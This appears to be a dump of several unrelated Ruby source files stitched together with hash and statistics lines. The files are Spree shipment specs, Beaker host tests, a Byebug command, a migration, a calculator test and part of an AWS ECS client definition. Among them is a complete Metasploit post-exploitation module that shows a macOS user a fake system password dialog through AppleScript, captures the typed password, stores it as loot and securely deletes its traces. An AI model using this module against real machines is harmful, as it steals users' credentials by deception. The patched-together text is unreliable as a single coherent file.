# Regression test for https://github.com/spree/spree/issues/2040
it "cannot ready a shipment for an order if the order is unpaid" do
expect(order).to receive_messages(paid?: false)
expect(shipment).not_to be_can_ready
end
end
context "updates cost when selected shipping rate is present" do
let(:shipment) { create(:shipment) }
before { shipment.selected_shipping_rate.update!(cost: 5) }
it "updates shipment totals" do
expect {
shipment.update_amounts
}.to change { shipment.cost }.to(5)
end
end
context "changes shipping rate via general update" do
let!(:ship_address) { create(:address) }
let!(:tax_zone) { create(:global_zone) } # will include the above address
let!(:tax_rate) { create(:tax_rate, amount: 0.10, zone: tax_zone, tax_categories: [tax_category]) }
let(:tax_category) { create(:tax_category) }
let(:order) do
create(
:order_ready_to_ship,
ship_address: ship_address,
shipment_cost: 10,
shipping_method: ten_dollar_shipping_method,
line_items_count: 1,
line_items_price: 100,
)
end
let(:ten_dollar_shipping_method) { create(:shipping_method, tax_category: tax_category, zones: [tax_zone], cost: 10) }
let(:twenty_dollar_shipping_method) { create(:shipping_method, tax_category: tax_category, zones: [tax_zone], cost: 20) }
let(:shipment) { order.shipments[0] }
let(:twenty_dollar_shipping_rate) do
create(:shipping_rate, cost: 20, shipment: shipment, shipping_method: twenty_dollar_shipping_method)
end
it "updates everything around order shipment total and state" do
expect(shipment.state).to eq 'ready'
expect(shipment.cost).to eq 10
expect(shipment.additional_tax_total).to eq 1
expect(order.shipment_total).to eq 10
expect(order.total).to eq 121 # shipment: 10 + 1 (tax) + line item: 100 + 10 (tax)
expect(order.payment_state).to eq 'paid'
shipment.update_attributes_and_order selected_shipping_rate_id: twenty_dollar_shipping_rate.id
expect(shipment.state).to eq 'pending'
expect(shipment.cost).to eq 20
expect(shipment.additional_tax_total).to eq 2
expect(order.shipment_total).to eq 20
expect(order.total).to eq 132 # shipment: 20 + 2 (tax) + line item: 100 + 10 (tax)
expect(order.payment_state).to eq 'balance_due'
end
end
context "currency" do
it "returns the order currency" do
expect(shipment.currency).to eq(order.currency)
end
end
context "nil costs" do
it "sets cost to 0" do
shipment = Spree::Shipment.new
shipment.valid?
expect(shipment.cost).to eq 0
end
end
context "#tracking_url" do
subject { shipment.tracking_url }
context "when tracking has not yet been set" do
it { is_expected.to be nil }
end
context "when tracking has been set, but a shipping method is not present" do
before do
shipment.tracking = "12345"
shipment.shipping_rates.clear
end
it { is_expected.to be nil }
end
context "when tracking has been set and a shipping method exists" do
before do
shipment.tracking = "12345"
shipment.shipping_method.update(tracking_url: "https://example.com/:tracking")
end
it "builds the tracking url with the shipping method" do
expect(subject).to eql("https://example.com/12345")
end
end
end
context "set up new inventory units" do
# let(:line_item) { double(
let(:variant) { double("Variant", id: 9) }
let(:inventory_units) { double }
let(:params) do
{ variant_id: variant.id, state: 'on_hand', line_item_id: line_item.id }
end
before { allow(shipment).to receive_messages inventory_units: inventory_units }
it "associates variant and order" do
expect(inventory_units).to receive(:create).with(params)
shipment.set_up_inventory('on_hand', variant, order, line_item)
end
end
# Regression test for https://github.com/spree/spree/issues/3349
context "#destroy" do
let(:shipping_rate) do
Spree::ShippingRate.create!(
shipping_method: shipping_method,
selected: true,
taxes: [Spree::ShippingRateTax.new(amount: 20)]
)
end
it "destroys linked shipping_rates and shipping_rate_taxes" do
shipping_rate = shipment.shipping_rates.first
shipping_rate_tax = shipping_rate.taxes.first
shipment.destroy
expect{shipping_rate.reload}.to raise_error(ActiveRecord::RecordNotFound)
expect{shipping_rate_tax.reload}.to raise_error(ActiveRecord::RecordNotFound)
end
end
# Regression test for https://github.com/spree/spree/issues/4072 (kinda)
# The need for this was discovered in the research for https://github.com/spree/spree/issues/4702
context "state changes" do
before do
# Must be stubbed so transition can succeed
allow(order).to receive_messages paid?: true
end
it "are logged to the database" do
expect(shipment.state_changes).to be_empty
expect(shipment.ready!).to be true
expect(shipment.state_changes.count).to eq(1)
state_change = shipment.state_changes.first
expect(state_change.previous_state).to eq('pending')
expect(state_change.next_state).to eq('ready')
end
end
context "don't require shipment" do
let(:stock_location) { create(:stock_location, fulfillable: false) }
let(:unshippable_shipment) do
create(
:shipment,
stock_location: stock_location,
inventory_units: [build(:inventory_unit)]
)
end
before { allow(order).to receive_messages paid?: true }
it 'proceeds automatically to shipped state' do
unshippable_shipment.ready!
expect(unshippable_shipment.state).to eq('shipped')
end
it 'does not send a confirmation email' do
expect {
unshippable_shipment.ready!
unshippable_shipment.inventory_units.reload.each do |unit|
expect(unit.state).to eq('shipped')
end
}.not_to change{ ActionMailer::Base.deliveries.count }
end
end
context "destroy prevention" do
it "can be destroyed when pending" do
shipment = create(:shipment, state: "pending")
expect(shipment.destroy).to be_truthy
expect { shipment.reload }.to raise_error(ActiveRecord::RecordNotFound)
end
it "can be destroyed when ready" do
shipment = create(:shipment, state: "ready")
expect(shipment.destroy).to be_truthy
expect { shipment.reload }.to raise_error(ActiveRecord::RecordNotFound)
end
it "cannot be destroyed when shipped" do
shipment = create(:shipment, state: "shipped")
expect(shipment.destroy).to eq false
expect(shipment.errors.full_messages.join).to match /Cannot destroy/
expect { shipment.reload }.not_to raise_error
end
it "cannot be destroyed when canceled" do
shipment = create(:shipment, state: "canceled")
expect(shipment.destroy).to eq false
expect(shipment.errors.full_messages.join).to match /Cannot destroy/
expect { shipment.reload }.not_to raise_error
end
end
describe "#finalize!" do
let(:inventory_unit) { shipment.inventory_units.first }
let(:stock_item) { inventory_unit.variant.stock_items.find_by(stock_location: stock_location) }
before do
stock_item.set_count_on_hand(10)
stock_item.update_attributes!(backorderable: false)
inventory_unit.update_attributes!(pending: true)
end
subject { shipment.finalize! }
it "updates the associated inventory units" do
inventory_unit.update_columns(updated_at: 1.hour.ago)
expect { subject }.to change { inventory_unit.reload.updated_at }
end
it "unstocks the variant" do
expect { subject }.to change { stock_item.reload.count_on_hand }.from(10).to(9)
end
context "inventory unit already finalized" do
before do
inventory_unit.update_attributes!(pending: false)
end
it "doesn't update the associated inventory units" do
expect { subject }.to_not change { inventory_unit.reload.updated_at }
end
it "doesn't unstock the variant" do
expect { subject }.to_not change { stock_item.reload.count_on_hand }
end
end
end
describe ".by_store" do
it "returns shipments by store" do
olivanders_store = create(:store, name: 'Olivanders')
wizard_shipment = create(:shipment, order: create(:order, store: olivanders_store))
create(:shipment, order: build(:order, store: create(:store, name: 'Target')))
shipments = Spree::Shipment.by_store(olivanders_store)
expect(Spree::Shipment.count).to eq(2)
expect(shipments.count).to eq(1)
expect(shipments.first).to eq(wizard_shipment)
end
end
describe '#selected_shipping_rate_id=' do
let!(:air_shipping_method) { create(:shipping_method, name: "Air") }
let(:new_rate) { shipment.shipping_rates.create!(shipping_method: air_shipping_method) }
context 'selecting the same id' do
it 'keeps the same shipping rate selected' do
expect {
shipment.selected_shipping_rate_id = shipping_rate.id
}.not_to change { shipping_rate.selected }.from(true)
end
end
context 'when the id exists' do
it 'sets the new shipping rate as selected' do
expect {
shipment.selected_shipping_rate_id = new_rate.id
}.to change { new_rate.selected }.from(false).to(true)
end
it 'sets the old shipping rate as not selected' do
expect {
shipment.selected_shipping_rate_id = new_rate.id
}.to change { shipping_rate.selected }.from(true).to(false)
end
end
context 'when the id does not exist' do
it 'raises a RecordNotFound error' do
expect {
shipment.selected_shipping_rate_id = -1
}.to raise_error(ArgumentError)
# Should not change selection
expect(shipping_rate.reload).to be_selected
end
end
end
describe "#shipping_method" do
let(:shipment) { create(:shipment) }
subject { shipment.shipping_method }
context "when no shipping rate is selected" do
before do
shipment.shipping_rates.update_all(selected: false)
shipment.reload
end
it { is_expected.to be_nil }
end
context "when a shipping rate is selected" do
it "is expected to be the shipping rate's shipping method" do
expect(shipment.shipping_method).to eq(shipment.selected_shipping_rate.shipping_method)
end
end
end
end
| 33.895282 | 158 | 0.679986 |
21d2579b9a41f50bbcacb0c3473685e64c5566e0 | 5,553 | ##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Post
include Msf::Post::File
include Msf::Auxiliary::Report
def initialize(info={})
super( update_info( info,
'Name' => 'OSX Password Prompt Spoof',
'Description' => %q{
Presents a password prompt dialog to a logged-in OSX user.
},
'License' => MSF_LICENSE,
'Author' => [
'Joff Thyer <jsthyer[at]gmail.com>', # original post module
'joev' # bug fixes
],
'Platform' => [ 'osx' ],
'References' => [
['URL', 'http://blog.packetheader.net/2011/10/fun-with-applescript.html']
],
'SessionTypes' => [ "shell", "meterpreter" ]
))
register_options([
OptString.new(
'TEXTCREDS',
[
true,
'Text displayed when asking for password',
'Type your password to allow System Preferences to make changes'
]
),
OptString.new(
'ICONFILE',
[
true,
'Icon filename relative to bundle',
'UserUnknownIcon.icns'
]
),
OptString.new(
'BUNDLEPATH',
[
true,
'Path to bundle containing icon',
'/System/Library/CoreServices/CoreTypes.bundle'
]
),
OptInt.new('TIMEOUT', [true, 'Timeout for user to enter credentials', 60])
], self.class)
end
def cmd_exec(str)
print_status "Running cmd '#{str}'..."
super
end
# Run Method for when run command is issued
def run
if client.nil?
print_error("Invalid session ID selected. Make sure the host isn't dead.")
return
end
host = case session.type
when /meterpreter/
sysinfo["Computer"]
when /shell/
cmd_exec("/bin/hostname").chomp
end
print_status("Running module against #{host}")
dir = "/tmp/." + Rex::Text.rand_text_alpha((rand(8)+6))
runme = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6))
creds_osa = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6))
creds = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6))
pass_file = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6))
username = cmd_exec("/usr/bin/whoami").strip
cmd_exec("umask 0077")
cmd_exec("/bin/mkdir #{dir}")
# write the script that will launch things
write_file(runme, run_script)
cmd_exec("/bin/chmod 700 #{runme}")
# write the credentials script, compile and run
write_file(creds_osa,creds_script(pass_file))
cmd_exec("/usr/bin/osacompile -o #{creds} #{creds_osa}")
cmd_exec("#{runme} #{creds}")
print_status("Waiting for user '#{username}' to enter credentials...")
timeout = ::Time.now.to_f + datastore['TIMEOUT'].to_i
pass_found = false
while (::Time.now.to_f < timeout)
if ::File.exist?(pass_file)
print_status("Password entered! What a nice compliant user...")
pass_found = true
break
end
Rex.sleep(0.5)
end
if pass_found
password_data = read_file("#{pass_file}").strip
print_good("password file contents: #{password_data}")
passf = store_loot("password", "text/plain", session, password_data, "passwd.pwd", "OSX Password")
print_good("Password data stored as loot in: #{passf}")
else
print_status("Timeout period expired before credentials were entered!")
end
print_status("Cleaning up files in #{host}:#{dir}")
cmd_exec("/usr/bin/srm -rf #{dir}")
end
# "wraps" the #creds_script applescript and allows it to make UI calls
def run_script
%Q{
#!/bin/bash
osascript <<EOF
set scriptfile to "$1"
tell application "AppleScript Runner"
do script scriptfile
end tell
EOF
}
end
# applescript that displays the actual password prompt dialog
def creds_script(pass_file)
textcreds = datastore['TEXTCREDS']
ascript = %Q{
set filename to "#{pass_file}"
set myprompt to "#{textcreds}"
set ans to "Cancel"
repeat
try
tell application "Finder"
activate
tell application "System Events" to keystroke "h" using {command down, option down}
set d_returns to display dialog myprompt default answer "" with hidden answer buttons {"Cancel", "OK"} default button "OK" with icon path to resource "#{datastore['ICONFILE']}" in bundle "#{datastore['BUNDLEPATH']}"
set ans to button returned of d_returns
set mypass to text returned of d_returns
if ans is equal to "OK" and mypass is not equal to "" then exit repeat
end tell
end try
end repeat
try
set now to do shell script "date '+%Y%m%d_%H%M%S'"
set user to do shell script "whoami"
set myfile to open for access filename with write permission
set outstr to now & ":" & user & ":" & mypass & "
"
write outstr to myfile starting at eof
close access myfile
on error
try
close access myfile
end try
end try
}
end
# Checks if the target is OSX Server
def check_server
cmd_exec("/usr/bin/sw_vers -productName").chomp =~ /Server/
end
# Enumerate the OS Version
def get_ver
# Get the OS Version
cmd_exec("/usr/bin/sw_vers", "-productVersion").chomp
end
end
| 30.179348 | 227 | 0.599496 |
4a24df37cd7e28df9990d7378ee55830510a3b86 | 143 | require 'rails_helper'
RSpec.describe "equipment/show.html.haml", type: :view do
pending "add some examples to (or delete) #{__FILE__}"
end
| 23.833333 | 57 | 0.741259 |
b9fed6e218ecbd3e115a7d3e6de883643a55c71d | 13,088 | require "helpers/test_helper"
test_name "confirm host object behave correctly"
step "#port_open? : can determine if a port is open on hosts"
hosts.each do |host|
logger.debug "port 22 (ssh) should be open on #{host}"
assert_equal(true, host.port_open?(22), "port 22 on #{host} should be open")
logger.debug "port 65535 should be closed on #{host}"
assert_equal(false, host.port_open?(65535), "port 65535 on #{host} should be closed")
end
step "#ip : can determine the ip address on hosts"
hosts.each do |host|
ip = host.ip
# confirm ip format
logger.debug("format of #{ip} for #{host} should be correct")
assert_match(/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/, ip, "#{ip} on #{host} isn't correct format")
end
step "#is_x86_64? : can determine arch on hosts"
hosts.each do |host|
if host['platform'] =~ /x86_64|_64|amd64|-64/
assert_equal(true, host.is_x86_64?, "is_x86_64? should be true on #{host}: #{host['platform']}")
else
assert_equal(false, host.is_x86_64?, "is_x86_64? should be false on #{host}: #{host['platform']}")
end
end
step "#get_env_var : can get a specific environment variable"
hosts.each do |host|
env_prefix = 'BEAKER' + SecureRandom.hex(4).upcase
env_param1 = "#{env_prefix}_p1"
env_value1 = "#{env_prefix}_v1"
host.clear_env_var(env_param1)
host.add_env_var(env_param1,env_value1)
val = host.get_env_var(env_param1)
assert_match(/^#{env_param1}=#{env_value1}$/, val, "get_env_var can get a specific environment variable")
end
step "#get_env_var : should not match a partial env key name"
hosts.each do |host|
env_id = 'BEAKER' + SecureRandom.hex(4).upcase
# Used as a prefix
env_param1 = "#{env_id}_pre"
env_value1 = "#{env_id}_pre"
# Used as a suffix
env_param2 = "suf_#{env_id}"
env_value2 = "suf_#{env_id}"
# Used as a infix
env_param3 = "in_#{env_id}_in"
env_value3 = "in_#{env_id}_in"
host.clear_env_var(env_param1)
host.clear_env_var(env_param2)
host.clear_env_var(env_param3)
host.add_env_var(env_param1,env_value1)
host.add_env_var(env_param1,env_value2)
host.add_env_var(env_param1,env_value3)
val = host.get_env_var(env_id)
assert('' == val,'get_env_var should not match a partial env key name')
end
step "#get_env_var : should not return a match from a key\'s value"
hosts.each do |host|
env_prefix = 'BEAKER' + SecureRandom.hex(4).upcase
env_param1 = "#{env_prefix}_p1"
env_value1 = "#{env_prefix}_v1"
host.clear_env_var(env_param1)
host.add_env_var(env_param1,env_value1)
val = host.get_env_var(env_value1)
assert('' == val,'get_env_var should not return a match from a key\'s value')
end
step "#clear_env_var : should only remove the specified key"
hosts.each do |host|
# Note - Must depend on `SecureRandom.hex(4)` creating a unique key as unable to depend on the function under test `clear_env_var`
env_id = 'BEAKER' + SecureRandom.hex(4).upcase
# Use env_id as a suffix
env_param1 = "p1_#{env_id}"
env_value1 = "v1_#{env_id}"
# Use env_id as a prefix
env_param2 = "#{env_id}_p2"
env_value2 = "#{env_id}_v2"
# Use env_id a key to delete
env_param3 = "#{env_id}"
env_value3 = "#{env_id}"
host.add_env_var(env_param1,env_value1)
host.add_env_var(env_param2,env_value2)
host.add_env_var(env_param3,env_value3)
host.clear_env_var(env_param3)
val = host.get_env_var(env_param1)
assert_match(/^#{env_param1}=#{env_value1}$/, val, "#{env_param1} should exist after calling clear_env_var")
val = host.get_env_var(env_param2)
assert_match(/^#{env_param2}=#{env_value2}$/, val, "#{env_param2} should exist after calling clear_env_var")
val = host.get_env_var(env_param3)
assert('' == val,"#{env_param3} should not exist after calling clear_env_var")
end
step "#add_env_var : can add a unique environment variable"
hosts.each do |host|
env_id = 'BEAKER' + SecureRandom.hex(4).upcase
env_param1 = "#{env_id}"
env_value1 = "#{env_id}"
# Use env_id as a prefix
env_param2 = "#{env_id}_pre"
env_value2 = "#{env_id}_pre"
# Use env_id as a suffix
env_param3 = "suf_#{env_id}"
env_value3 = "suf_#{env_id}"
host.clear_env_var(env_param1)
host.clear_env_var(env_param2)
host.clear_env_var(env_param3)
host.add_env_var(env_param1,env_value1)
host.add_env_var(env_param2,env_value2)
host.add_env_var(env_param3,env_value3)
val = host.get_env_var(env_param1)
assert_match(/^#{env_param1}=#{env_value1}$/, val, "#{env_param1} should exist")
val = host.get_env_var(env_param2)
assert_match(/^#{env_param2}=#{env_value2}$/, val, "#{env_param2} should exist")
val = host.get_env_var(env_param3)
assert_match(/^#{env_param3}=#{env_value3}$/, val, "#{env_param3} should exist")
end
step "#add_env_var : can add an environment variable"
hosts.each do |host|
host.clear_env_var("test")
logger.debug("add TEST=1")
host.add_env_var("TEST", "1")
logger.debug("add TEST=1 again (shouldn't create duplicate entry)")
host.add_env_var("TEST", "1")
logger.debug("add TEST=2")
host.add_env_var("TEST", "2")
logger.debug("ensure that TEST env var has correct setting")
logger.debug("add TEST=3")
host.add_env_var("TEST", "3")
logger.debug("ensure that TEST env var has correct setting")
val = host.get_env_var("TEST")
assert_match(/TEST=3(;|:)2(;|:)1$/, val, "add_env_var can correctly add env vars")
end
step "#add_env_var : can preserve an environment between ssh connections"
hosts.each do |host|
host.clear_env_var("TEST")
logger.debug("add TEST=1")
host.add_env_var("TEST", "1")
logger.debug("add TEST=1 again (shouldn't create duplicate entry)")
host.add_env_var("TEST", "1")
logger.debug("add TEST=2")
host.add_env_var("TEST", "2")
logger.debug("ensure that TEST env var has correct setting")
logger.debug("add TEST=3")
host.add_env_var("TEST", "3")
logger.debug("close the connection")
host.close
logger.debug("ensure that TEST env var has correct setting")
val = host.get_env_var("TEST")
assert_match(/TEST=3(;|:)2(;|:)1$/, val, "can preserve an environment between ssh connections")
end
step "#delete_env_var : can delete an environment"
hosts.each do |host|
logger.debug("remove TEST=3")
host.delete_env_var("TEST", "3")
val = host.get_env_var("TEST")
assert_match(/TEST=2(;|:)1$/, val, "delete_env_var can correctly delete part of a chained env var")
logger.debug("remove TEST=1")
host.delete_env_var("TEST", "1")
val = host.get_env_var("TEST")
assert_match(/TEST=2$/, val, "delete_env_var can correctly delete part of a chained env var")
logger.debug("remove TEST=2")
host.delete_env_var("TEST", "2")
val = host.get_env_var("TEST")
assert_equal("", val, "delete_env_var fully removes empty env var")
end
step "#mkdir_p : can recursively create a directory structure on a host"
hosts.each do |host|
#clean up first!
host.rm_rf("test1")
#test dir construction
logger.debug("create test1/test2/test3/test4")
assert_equal(true, host.mkdir_p("test1/test2/test3/test4"), "can create directory structure")
logger.debug("should be able to create a file in the new dir")
on host, host.touch("test1/test2/test3/test4/test.txt", false)
end
step "#do_scp_to : can copy a directory to the host with no ignores"
current_dir = File.dirname(__FILE__)
module_fixture = File.join(current_dir, "../../../fixtures/module")
hosts.each do |host|
logger.debug("can recursively copy a module over")
#make sure that we are clean on the test host
host.rm_rf("module")
host.do_scp_to(module_fixture, ".", {})
Dir.mktmpdir do |tmp_dir|
#grab copy from host
host.do_scp_from("module", tmp_dir, {})
#compare to local copy
local_paths = Dir.glob(File.join(module_fixture, "**/*")).select { |f| File.file?(f) }
host_paths = Dir.glob(File.join(File.join(tmp_dir, "module"), "**/*")).select { |f| File.file?(f) }
#each local file should have a single match on the host
local_paths.each do |path|
search_name = path.gsub(/^.*fixtures\//, '') #reduce down to the path that should match
matched = host_paths.select{ |check| check =~ /#{Regexp.escape(search_name)}$/ }
assert_equal(1, matched.length, "should have found a single instance of path #{search_name}, found #{matched.length}: \n #{matched}")
host_paths = host_paths - matched
end
assert_equal(0, host_paths.length, "there are extra paths on #{host} (#{host_paths})")
end
end
step "#do_scp_to with :ignore : can copy a dir to the host, excluding ignored patterns that DO NOT appear in the source absolute path"
current_dir = File.dirname(__FILE__)
module_fixture = File.expand_path(File.join(current_dir, "../../../fixtures/module"))
hosts.each do |host|
logger.debug("can recursively copy a module over, ignoring some files/dirs")
#make sure that we are clean on the test host
host.rm_rf("module")
host.do_scp_to(module_fixture, ".", {:ignore => ['vendor', 'Gemfile']})
Dir.mktmpdir do |tmp_dir|
#grab copy from host
host.do_scp_from("module", tmp_dir, {})
#compare to local copy
local_paths = Dir.glob(File.join(module_fixture, "**/*")).select { |f| File.file?(f) }
host_paths = Dir.glob(File.join(File.join(tmp_dir, "module"), "**/*")).select { |f| File.file?(f) }
#each local file should have a single match on the host
local_paths.each do |path|
search_name = path.gsub(/^.*fixtures\//, '') #reduce down to the path that should match
matched = host_paths.select{ |check| check =~ /#{Regexp.escape(search_name)}$/ }
re = /((\/|\A)vendor(\/|\z))|((\/|\A)Gemfile(\/|\z))/
if path !~ re
assert_equal(1, matched.length, "should have found a single instance of path #{search_name}, found #{matched.length}: \n #{matched}")
else
assert_equal(0, matched.length, "should have found no instances of path #{search_name}, found #{matched.length}: \n #{matched}")
end
host_paths = host_paths - matched
end
assert_equal(0, host_paths.length, "there are extra paths on #{host} (#{host_paths})")
end
end
step "#do_scp_to with :ignore : can copy a dir to the host, excluding ignored patterns that DO appear in the source absolute path"
current_dir = File.dirname(__FILE__)
module_fixture = File.expand_path(File.join(current_dir, "../../../fixtures/module"))
hosts.each do |host|
logger.debug("can recursively copy a module over, ignoring some sub-files/sub-dirs that also appear in the absolute path")
#make sure that we are clean on the test host
host.rm_rf("module")
host.do_scp_to(module_fixture, ".", {:ignore => ['module', 'Gemfile']})
Dir.mktmpdir do |tmp_dir|
#grab copy from host
host.do_scp_from("module", tmp_dir, {})
#compare to local copy
local_paths = Dir.glob(File.join(module_fixture, "**/*")).select { |f| File.file?(f) }
host_paths = Dir.glob(File.join(File.join(tmp_dir, "module"), "**/*")).select { |f| File.file?(f) }
#each local file should have a single match on the host
local_paths.each do |path|
search_name = path.gsub(/^.*fixtures\/module\//, '') #reduce down to the path that should match
matched = host_paths.select{ |check| check =~ /#{Regexp.escape(search_name)}$/ }
re = /((\/|\A)module(\/|\z))|((\/|\A)Gemfile(\/|\z))/
if path.gsub(/^.*module\//, '') !~ re
assert_equal(1, matched.length, "should have found a single instance of path #{search_name}, found #{matched.length}: \n #{matched}")
else
assert_equal(0, matched.length, "should have found no instances of path #{search_name}, found #{matched.length}: \n #{matched}")
end
host_paths = host_paths - matched
end
assert_equal(0, host_paths.length, "there are extra paths on #{host} (#{host_paths})")
end
end
step "Ensure scp errors close the ssh connection" do
step 'Attempt to generate a remote file that does not exist' do
# This assert relies on the behavior of the net-scp library to
# raise an error when #channel.on_close is called, which is called by
# indirectly called by beaker's own SshConnection #close mehod. View
# the source for further info:
# https://github.com/net-ssh/net-sacp/blob/master/lib/net/scp.rb
assert_raises Net::SCP::Error do
create_remote_file(default, '/tmp/this/path/cannot/possibly/exist.txt', "contents")
end
end
step 'Ensure that a subsequent ssh connection works' do
# If the ssh connection was left in a dangling state, then this #on call will hang
on default, 'true'
end
step 'Attempt to scp from a resource on the SUT that does not exist' do
# This assert relies on the behavior of the net-scp library to
# use the Dir.mkdir method in the #download_start_state method.
# See the source for further info:
# https://github.com/net-ssh/net-sacp/blob/master/lib/net/scp/download.rb
assert_raises Errno::ENOENT do
scp_from default, '/tmp/path/dne/wtf/bbq', '/tmp/path/dne/wtf/bbq'
end
end
step 'Ensure that a subsequent ssh connection works' do
# If the ssh connection was left in a dangling state, then this #on call will hang
on default, 'true'
end
end
| 41.028213 | 141 | 0.697051 |
33aede2523981881811e7b320d49631d69730855 | 1,081 | module Byebug
#
# Implements the finish functionality.
#
# Allows the user to continue execution until certain frames are finished.
#
class FinishCommand < Command
self.allow_in_post_mortem = false
def regexp
/^\s* fin(?:ish)? (?:\s+(\S+))? \s*$/x
end
def execute
max_frames = Context.stack_size - @state.frame_pos
if @match[1]
n_frames, err = get_int(@match[1], 'finish', 0, max_frames - 1)
return errmsg(err) unless n_frames
else
n_frames = 1
end
force = n_frames == 0 ? true : false
@state.context.step_out(@state.frame_pos + n_frames, force)
@state.frame_pos = 0
@state.proceed
end
class << self
def names
%w(finish)
end
def description
%(fin[ish][ n_frames] Execute until frame returns.
If no number is given, we run until the current frame returns. If a
number of frames `n_frames` is given, then we run until `n_frames`
return from the current position.)
end
end
end
end
| 24.568182 | 77 | 0.601295 |
e261f879966dab5fbebb4142b98c732883e0bdbb | 169 | class AddHasRequestedSwapToDayAssignments < ActiveRecord::Migration
def change
add_column :day_assignments, :has_requested_swap, :boolean, default: false
end
end
| 28.166667 | 77 | 0.816568 |
5db4453f4c736b5ae634eda088070efb250143fb | 801 | require 'minitest/autorun'
require 'string_calc/day08'
class StringCalcTest < Minitest::Test
def setup
@calc = StringCalc.new
end
def test_compute_negative_number
assert_equal -7, @calc.compute('-7')
end
def test_compute_addition
assert_equal 4 + 9, @calc.compute('4+9')
end
def test_compute_subtraction
assert_equal 12 - 5, @calc.compute('12-5')
end
def test_compute_multiplication
assert_equal 5 * 8, @calc.compute('5*8')
end
def test_compute_division
assert_equal 18 / 3, @calc.compute('18/3')
end
def test_compute_many_operations
assert_equal 4 + 5 * 2 - 81 / 9, @calc.compute('4+5*2-81/9')
end
def test_compute_operations_with_parenthesis
assert_equal (8 + 3) * 7 - 64 / (13 - 5), @calc.compute('(8+3)*7-64/(13-5)')
end
end
| 21.648649 | 80 | 0.685393 |
91b3b18146b0e01e9267790c2e0d6bc0069c0a1c | 236 | require 'u2i/ci_utils'
require 'rails'
module U2i
module CiUtils
class Railtie < Rails::Railtie
railtie_name :u2i_ci_rake_tasks
rake_tasks do
require 'u2i/ci_utils/rake_tasks/all'
end
end
end
end
| 15.733333 | 45 | 0.677966 |
ff1c42c0b54d8b02b71d47b126beb47584fd7c8f | 99,019 | # WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/master/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
module Aws::ECS
# @api private
module ClientApi
include Seahorse::Model
AccessDeniedException = Shapes::StructureShape.new(name: 'AccessDeniedException')
AgentUpdateStatus = Shapes::StringShape.new(name: 'AgentUpdateStatus')
AssignPublicIp = Shapes::StringShape.new(name: 'AssignPublicIp')
Attachment = Shapes::StructureShape.new(name: 'Attachment')
AttachmentDetails = Shapes::ListShape.new(name: 'AttachmentDetails')
AttachmentStateChange = Shapes::StructureShape.new(name: 'AttachmentStateChange')
AttachmentStateChanges = Shapes::ListShape.new(name: 'AttachmentStateChanges')
Attachments = Shapes::ListShape.new(name: 'Attachments')
Attribute = Shapes::StructureShape.new(name: 'Attribute')
AttributeLimitExceededException = Shapes::StructureShape.new(name: 'AttributeLimitExceededException')
Attributes = Shapes::ListShape.new(name: 'Attributes')
AwsVpcConfiguration = Shapes::StructureShape.new(name: 'AwsVpcConfiguration')
BlockedException = Shapes::StructureShape.new(name: 'BlockedException')
Boolean = Shapes::BooleanShape.new(name: 'Boolean')
BoxedBoolean = Shapes::BooleanShape.new(name: 'BoxedBoolean')
BoxedInteger = Shapes::IntegerShape.new(name: 'BoxedInteger')
ClientException = Shapes::StructureShape.new(name: 'ClientException')
Cluster = Shapes::StructureShape.new(name: 'Cluster')
ClusterContainsContainerInstancesException = Shapes::StructureShape.new(name: 'ClusterContainsContainerInstancesException')
ClusterContainsServicesException = Shapes::StructureShape.new(name: 'ClusterContainsServicesException')
ClusterContainsTasksException = Shapes::StructureShape.new(name: 'ClusterContainsTasksException')
ClusterField = Shapes::StringShape.new(name: 'ClusterField')
ClusterFieldList = Shapes::ListShape.new(name: 'ClusterFieldList')
ClusterNotFoundException = Shapes::StructureShape.new(name: 'ClusterNotFoundException')
Clusters = Shapes::ListShape.new(name: 'Clusters')
Compatibility = Shapes::StringShape.new(name: 'Compatibility')
CompatibilityList = Shapes::ListShape.new(name: 'CompatibilityList')
Connectivity = Shapes::StringShape.new(name: 'Connectivity')
Container = Shapes::StructureShape.new(name: 'Container')
ContainerDefinition = Shapes::StructureShape.new(name: 'ContainerDefinition')
ContainerDefinitions = Shapes::ListShape.new(name: 'ContainerDefinitions')
ContainerInstance = Shapes::StructureShape.new(name: 'ContainerInstance')
ContainerInstanceStatus = Shapes::StringShape.new(name: 'ContainerInstanceStatus')
ContainerInstances = Shapes::ListShape.new(name: 'ContainerInstances')
ContainerOverride = Shapes::StructureShape.new(name: 'ContainerOverride')
ContainerOverrides = Shapes::ListShape.new(name: 'ContainerOverrides')
ContainerStateChange = Shapes::StructureShape.new(name: 'ContainerStateChange')
ContainerStateChanges = Shapes::ListShape.new(name: 'ContainerStateChanges')
Containers = Shapes::ListShape.new(name: 'Containers')
CreateClusterRequest = Shapes::StructureShape.new(name: 'CreateClusterRequest')
CreateClusterResponse = Shapes::StructureShape.new(name: 'CreateClusterResponse')
CreateServiceRequest = Shapes::StructureShape.new(name: 'CreateServiceRequest')
CreateServiceResponse = Shapes::StructureShape.new(name: 'CreateServiceResponse')
DeleteAttributesRequest = Shapes::StructureShape.new(name: 'DeleteAttributesRequest')
DeleteAttributesResponse = Shapes::StructureShape.new(name: 'DeleteAttributesResponse')
DeleteClusterRequest = Shapes::StructureShape.new(name: 'DeleteClusterRequest')
DeleteClusterResponse = Shapes::StructureShape.new(name: 'DeleteClusterResponse')
DeleteServiceRequest = Shapes::StructureShape.new(name: 'DeleteServiceRequest')
DeleteServiceResponse = Shapes::StructureShape.new(name: 'DeleteServiceResponse')
Deployment = Shapes::StructureShape.new(name: 'Deployment')
DeploymentConfiguration = Shapes::StructureShape.new(name: 'DeploymentConfiguration')
Deployments = Shapes::ListShape.new(name: 'Deployments')
DeregisterContainerInstanceRequest = Shapes::StructureShape.new(name: 'DeregisterContainerInstanceRequest')
DeregisterContainerInstanceResponse = Shapes::StructureShape.new(name: 'DeregisterContainerInstanceResponse')
DeregisterTaskDefinitionRequest = Shapes::StructureShape.new(name: 'DeregisterTaskDefinitionRequest')
DeregisterTaskDefinitionResponse = Shapes::StructureShape.new(name: 'DeregisterTaskDefinitionResponse')
